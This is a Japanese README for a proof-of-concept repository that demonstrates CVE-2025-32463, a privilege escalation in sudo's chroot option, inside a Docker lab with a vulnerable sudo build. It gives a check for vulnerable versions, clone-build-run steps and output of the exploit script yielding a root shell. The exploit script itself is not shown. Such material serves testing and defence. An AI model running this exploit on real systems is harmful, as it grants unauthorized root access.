
このリポジトリは、sudo の chroot 機能における CVE‑2025‑32463 権限昇格の脆弱性を実証するための、最小限かつ再現可能な環境を提供します。
ほとんどの Linux ディストリビューションにおいて、sudo 1.9.14 から 1.9.17(すべての p リビジョン)までの脆弱なビルドが影響を受けます。
セキュリティページ
| ファイル | 目的 |
|---|---|
| Dockerfile | 脆弱な sudo 1.9.16p2 とビルドツールを含む Ubuntu 24.04 イメージを構築します |
| sudo‑chwoot.sh | chroot 内で root シェルを起動する PoC エクスプロイト |
| run.sh | イメージを(必要に応じて)構築し、エクスプロイトコンテナを起動するヘルパースクリプト |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh は Docker に --privileged と --rm を渡すため、コンテナは終了時に自分自身をクリーンアップします。
作業が終わったらイメージを削除します:
docker rmi sudo-chwoot